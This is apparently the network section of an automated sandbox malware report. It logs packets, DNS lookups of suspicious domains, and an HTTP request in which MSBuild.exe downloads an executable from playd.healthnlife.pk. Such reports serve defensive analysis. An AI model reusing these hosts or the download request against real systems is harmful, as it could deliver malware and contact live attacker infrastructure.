                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345060110 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345071077 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345082998 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345103025 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345118999 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345146894 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345159054 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345170021 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345180988 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345187902 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345220089 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345242977 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345278025 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345288038 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345298052 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345326900 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.345345974 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353161097 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353180885 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353192091 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353230000 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353255987 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355452061 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355470896 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355484009 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355496883 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355509043 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355509043 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355549097 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355573893 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426343918 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426359892 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426374912 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426394939 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426440001 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426451921 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426479101 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426510096 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426510096 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426525116 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426553011 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426575899 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581537008 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581581116 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581758022 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581969023 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581983089 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.232314110 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.232362986 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.232433081 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.245146036 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.245167971 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.459486008 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.459716082 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.564888000 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.564898968 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.818238020 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.818258047 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.096350908 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.096442938 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.100183964 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.100198984 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.100481987 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.143651962 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.191405058 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716028929 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716054916 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716123104 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716145992 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716166973 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716170073 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716190100 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716202021 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716209888 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716231108 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.826562881 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.826683998 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.826750040 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.826750040 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.827131987 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.827159882 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828423023 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828465939 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828547001 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828816891 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828826904 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897417068 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897445917 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897480011 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897562981 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897594929 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897610903 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897614002 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897660971 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.898922920 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.898943901 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.898952961 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.898958921 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.918508053 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.918555021 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.918646097 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.918987989 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.919003963 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.689928055 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.690113068 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.691683054 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.691700935 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.692408085 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.693716049 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.693742037 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.693840027 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.848171949 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.848335028 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.848951101 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.848968983 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.850861073 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.850868940 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.246557951 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.246692896 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.246771097 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.259984016 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.260009050 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.260021925 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.260029078 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.601295948 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.601377010 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.601409912 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.601461887 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.770139933 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.770180941 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.838911057 CEST5626880192.168.2.845.132.206.251
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.843837023 CEST805626845.132.206.251192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.843941927 CEST5626880192.168.2.845.132.206.251
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.844088078 CEST5626880192.168.2.845.132.206.251
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.844124079 CEST5626880192.168.2.845.132.206.251
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.848937988 CEST805626845.132.206.251192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.848969936 CEST805626845.132.206.251192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.849167109 CEST805626845.132.206.251192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.849176884 CEST805626845.132.206.251192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:22.702121973 CEST805626845.132.206.251192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:22.702270985 CEST5626880192.168.2.845.132.206.251
                                                                                                                                                                                                                    Oct 3, 2024 15:15:26.999543905 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:26.999596119 CEST5626880192.168.2.845.132.206.251

                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Oct 3, 2024 15:14:33.989551067 CEST6220953192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:14:33.996603966 CEST53622091.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.124393940 CEST5350488162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.615082026 CEST6380353192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.622585058 CEST53638031.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.495158911 CEST5042753192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.502089024 CEST53504271.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.018253088 CEST5244853192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.027673006 CEST53524481.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.029567957 CEST5421253192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.049174070 CEST53542121.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.058566093 CEST5454653192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.067459106 CEST53545461.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.069566965 CEST6306053192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.078824043 CEST53630601.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.080580950 CEST5955153192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.098201990 CEST53595511.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.101598024 CEST6112153192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.111228943 CEST53611211.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.113568068 CEST5586553192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.122704029 CEST53558651.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.125504971 CEST5073253192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.135046005 CEST53507321.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.139408112 CEST5295153192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.146322012 CEST53529511.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.902789116 CEST6061453192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.914516926 CEST53606141.1.1.1192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.829094887 CEST5437153192.168.2.81.1.1.1
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.838028908 CEST53543711.1.1.1192.168.2.8

                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Oct 3, 2024 15:14:33.989551067 CEST192.168.2.81.1.1.10xf4b3Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.615082026 CEST192.168.2.81.1.1.10x72eStandard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.495158911 CEST192.168.2.81.1.1.10xd296Standard query (0)playd.healthnlife.pkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.018253088 CEST192.168.2.81.1.1.10xf8e5Standard query (0)soldiefieop.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.029567957 CEST192.168.2.81.1.1.10x34a7Standard query (0)questionsmw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.058566093 CEST192.168.2.81.1.1.10x207cStandard query (0)abnomalrkmu.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.069566965 CEST192.168.2.81.1.1.10x699cStandard query (0)chorusarorp.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.080580950 CEST192.168.2.81.1.1.10x81f2Standard query (0)treatynreit.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.101598024 CEST192.168.2.81.1.1.10x7fc0Standard query (0)snarlypagowo.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.113568068 CEST192.168.2.81.1.1.10xf424Standard query (0)mysterisop.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.125504971 CEST192.168.2.81.1.1.10x8144Standard query (0)absorptioniw.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.139408112 CEST192.168.2.81.1.1.10x3abfStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.902789116 CEST192.168.2.81.1.1.10x2717Standard query (0)advocachark.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.829094887 CEST192.168.2.81.1.1.10x6c4dStandard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Oct 3, 2024 15:14:11.289203882 CEST1.1.1.1192.168.2.80xb54dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:14:11.289203882 CEST1.1.1.1192.168.2.80xb54dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:14:24.113076925 CEST1.1.1.1192.168.2.80x21edNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:14:24.113076925 CEST1.1.1.1192.168.2.80x21edNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:14:33.996603966 CEST1.1.1.1192.168.2.80xf4b3No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.622585058 CEST1.1.1.1192.168.2.80x72eName error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.502089024 CEST1.1.1.1192.168.2.80xd296No error (0)playd.healthnlife.pk147.45.44.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:12.825016022 CEST1.1.1.1192.168.2.80x1d78No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:12.825016022 CEST1.1.1.1192.168.2.80x1d78No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:14.270154953 CEST1.1.1.1192.168.2.80x1c05No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:14.270154953 CEST1.1.1.1192.168.2.80x1c05No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.027673006 CEST1.1.1.1192.168.2.80xf8e5Name error (3)soldiefieop.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.049174070 CEST1.1.1.1192.168.2.80x34a7Name error (3)questionsmw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.067459106 CEST1.1.1.1192.168.2.80x207cName error (3)abnomalrkmu.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.078824043 CEST1.1.1.1192.168.2.80x699cName error (3)chorusarorp.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.098201990 CEST1.1.1.1192.168.2.80x81f2Name error (3)treatynreit.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.111228943 CEST1.1.1.1192.168.2.80x7fc0Name error (3)snarlypagowo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.122704029 CEST1.1.1.1192.168.2.80xf424Name error (3)mysterisop.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.135046005 CEST1.1.1.1192.168.2.80x8144Name error (3)absorptioniw.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.146322012 CEST1.1.1.1192.168.2.80x3abfNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.914516926 CEST1.1.1.1192.168.2.80x2717No error (0)advocachark.store172.67.166.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.914516926 CEST1.1.1.1192.168.2.80x2717No error (0)advocachark.store104.21.42.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 3, 2024 15:15:21.838028908 CEST1.1.1.1192.168.2.80x6c4dNo error (0)cowod.hopto.org45.132.206.251A (IP address)IN (0x0001)false

                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                    • 49.12.197.9
                                                                                                                                                                                                                    • advocachark.store
                                                                                                                                                                                                                    • playd.healthnlife.pk
                                                                                                                                                                                                                    • cowod.hopto.org

                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.856259147.45.44.104803832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.507978916 CEST190OUTGET /ldms/a43486128347.exe HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: playd.healthnlife.pk
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774779081 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:14 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 540536
                                                                                                                                                                                                                    Last-Modified: Thu, 03 Oct 2024 12:52:19 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Keep-Alive: timeout=120
                                                                                                                                                                                                                    ETag: "66fe9383-83f78"
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 b2 eb 8a 60 d3 85 d9 60 d3 85 d9 60 d3 85 d9 b3 a1 86 d8 6c d3 85 d9 b3 a1 80 d8 ca d3 85 d9 b3 a1 81 d8 75 d3 85 d9 a2 52 81 d8 72 d3 85 d9 a2 52 86 d8 74 d3 85 d9 b3 a1 84 d8 65 d3 85 d9 60 d3 84 d9 39 d3 85 d9 a2 52 80 d8 2e d3 85 d9 93 51 8c d8 61 d3 85 d9 93 51 7a d9 61 d3 85 d9 93 51 87 d8 61 d3 85 d9 52 69 63 68 60 d3 85 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 93 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 c8 01 00 00 5a 06 00 00 00 00 00 72 6f 00 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 08 00 00 04 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$```luRrRte`9R.QaQzaQaRich`PELf'Zro@`@0m<0x)@xPO@4.text `.rdata$@@.datab@.rsrc0@@.reloc@@B
